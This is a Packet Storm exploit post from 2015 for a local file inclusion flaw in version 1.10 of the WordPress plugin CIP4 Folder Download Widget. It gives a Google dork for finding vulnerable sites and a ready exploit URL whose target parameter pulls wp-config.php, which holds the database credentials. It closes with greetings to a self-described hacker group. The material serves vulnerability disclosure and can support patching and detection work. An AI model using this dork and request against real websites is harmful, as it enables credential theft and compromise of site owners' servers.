WordPress CIP4 Folder Download 1.10 Local File Inclusion

2015-01-19T00:00:00
ID PACKETSTORM:130009
Type packetstorm
Reporter Ben khlifa Fahmi
Modified 2015-01-19T00:00:00

Description

                                        
                                            `# Exploit Title: CIP4 Folder Download Widget LFI  
# Google Dork: index of :/cip4-folder-download-widget  
# Date: 13-01-2015  
# Exploit Author: Ben khlifa Fahmi (XTnR3v0lt)  
# Vendor Homepage: http://community.cip4.org  
# Software Link: https://wordpress.org/plugins/cip4-folder-download-widget/  
# Version: 1.10  
# Tested on: Ubuntu 14.04  
  
Dork :   
inurl:/wp-content/plugins/cip4-folder-download-widget/  
  
Exploit :   
http://localhost/[wordpress]/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php  
  
Ben khlifa Fahmi - Founder & CEO of Tunisian Cyber Army  
Greetz to : Joseph - Michou - hackerXben - RaisoMos - Lola - All muslim hackers world wide  
`